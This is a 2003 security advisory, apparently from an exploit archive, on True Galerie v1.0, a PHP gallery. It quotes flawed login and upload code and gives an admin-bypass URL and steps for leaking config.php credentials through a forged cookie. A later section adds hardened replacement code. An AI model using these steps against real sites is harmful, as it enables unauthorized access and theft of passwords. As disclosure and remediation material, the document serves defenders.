
truegalerie.txt

Posted Apr 27, 2003
Authored by Frog Man | Site frog-man.org

A problem exists in True Galerie v1.0 that allows a remote attacker to obtain administrative access to this utility due to misuse of cookies.

tags | exploit, remote
SHA-256 | d60704ec2fd8a3caefc2462af52a5c5019ab052febae606e69424fa837d5ec1a


Information :
°°°°°°°°°°°°°°
Language : PHP
Website : http://www.truelogik.net
Version : 1.0
Problems :
- Admin Access
- File Copy


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
verif_admin.php, check_admin.php :

------------------------------------------------------------------------

<?
if(isset($connect)) {
if($connect=="$passadmin") setcookie("loggedin","ok");
if($connect=="no") setcookie("loggedin");
Header("Location: ".$PHP_SELF);
}

$ok = ($loggedin!="");

if($ok) {
echo "<center>";
echo "<table>";
echo "<tr><td align='center'><a href='?connect=no'>DECONNEXION</a></td></tr>";
echo "</table>";
echo "</center>";
}
else {
echo "<center><form method='post'>";
echo "<table>";
echo "<tr><td align='center'>CONNEXION</td></tr>";
echo "<tr><td align='center'>Password : admin</td></tr>";
echo "<tr><td><input type='password' name='connect'></td></tr>";
echo "<tr><td><input type='submit' value='Login'></td></tr>";
echo "</table>";
echo "</form></center>";
}
?>

------------------------------------------------------------------------




upload.php :

----------------------------------------------------------------------
[...]
$userip = $REMOTE_ADDR;
$pseudo = $_POST['pseudo'];
$message = $_POST['message'];
$email = $_POST['email'];
[...]
if((!$pseudo) || (!$message) || (!$file)) {
[...]
exit;
}

if(!ereg('^[-!#$%&\'*+\\./0-9=?A-Z^_`a-z{|}~]+'.
'@'.
'[-!#$%&\'*+\\/0-9=?A-Z^_`a-z{|}~]+\.'.
'[-!#$%&\'*+\\./0-9=?A-Z^_`a-z{|}~]+$',
$email))
{
[...]
exit();
}

[...]

if ($file_size >= $MAX_FILE_SIZE)
{
[...]
exit();
}

if($HTTP_POST_FILES['file']['type']=="image/pjpeg") {
$ext="jpg";
}
elseif($HTTP_POST_FILES['file']['type']=="image/gif") {
$ext="gif";
}
if($HTTP_POST_FILES['file']['type']=="image/pjpeg"|$HTTP_POST_FILES['file']['type']=="image/gif")
{

$date = time();

$query = "INSERT INTO $tablegalerie
(cat_id,pseudo,email,url,message,date,clicks,img,userip)
VALUES('$cat_id','$pseudo','$email','$url','$message','$date','','','$userip')";

mysql_query($query);

$id=mysql_insert_id();
$random_name = makeRandomName();

$dest_file="./$folder/$random_name.$ext";

$query = "UPDATE $tablegalerie SET img='$dest_file' WHERE id='$id'";
mysql_query($query);

$res_copy=@copy($file,$dest_file);
@move_uploaded_file($file,$dest_file);
----------------------------------------------------------------------



Exploits :
°°°°°°°°°°
- To be admin :
http://[target]/admin.php?loggedin=1


- To read config.php (with admin password, DB password,...) :
1) Set a cookie named "file" and with the value "config.php" on
http://[target]/form.php
2) Fill in the form on this form.php page (the image has to be a real image,
.gif or .jpg !)
3) Submit the form
4) Go to the index, look at your file (the last registered image)
5) Read it : it's config.php.


Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info .


More Details In French :
°°°°°°°°°°°°°°°°°°°°°°°°
http://www.frog-man.org/tutos/TrueGalerie.txt




frog-m@n
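
Added example, not part of the original advisory or of True Galerie's code: a hardened form of the two code paths quoted above. Both flaws come from trusting request-populated globals ($loggedin, $file). The function names are hypothetical, and $passadmin and $folder are assumed to come from config.php as in the original.

```php
<?php
// Added example, not True Galerie's code. Function names are hypothetical;
// $passadmin and $folder are assumed to come from config.php.
session_start();

// Admin state lives in the server-side session, never in a client-supplied value.
function handle_login(string $passadmin): void {
    if (!isset($_POST['connect'])) {
        return;
    }
    if ($_POST['connect'] === 'no') {
        unset($_SESSION['is_admin']);
    } elseif (is_string($_POST['connect']) && hash_equals($passadmin, $_POST['connect'])) {
        session_regenerate_id(true);   // fresh session id after a privilege change
        $_SESSION['is_admin'] = true;
    }
}

function is_admin(): bool {
    // A "loggedin" query parameter or cookie has no effect on this check.
    return ($_SESSION['is_admin'] ?? false) === true;
}

// Returns the stored path, or null if the request carried no valid image upload.
function store_upload(string $folder, int $maxSize): ?string {
    $up = $_FILES['file'] ?? null;     // only populated by a real multipart upload
    if (!is_array($up) || $up['error'] !== UPLOAD_ERR_OK || $up['size'] >= $maxSize) {
        return null;
    }
    $tmp = $up['tmp_name'];
    if (!is_uploaded_file($tmp)) {     // rejects arbitrary paths such as "config.php"
        return null;
    }
    // Pick the extension from the file content, not the client-sent MIME type.
    $info = @getimagesize($tmp);
    $extByType = [IMAGETYPE_JPEG => 'jpg', IMAGETYPE_GIF => 'gif'];
    if ($info === false || !isset($extByType[$info[2]])) {
        return null;
    }
    $dest = "./$folder/" . bin2hex(random_bytes(16)) . '.' . $extByType[$info[2]];
    // No copy() fallback: move_uploaded_file() refuses sources that were not uploaded.
    return move_uploaded_file($tmp, $dest) ? $dest : null;
}
```

The database insert should only run after store_upload() returns a path, so a rejected upload leaves no gallery entry behind.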







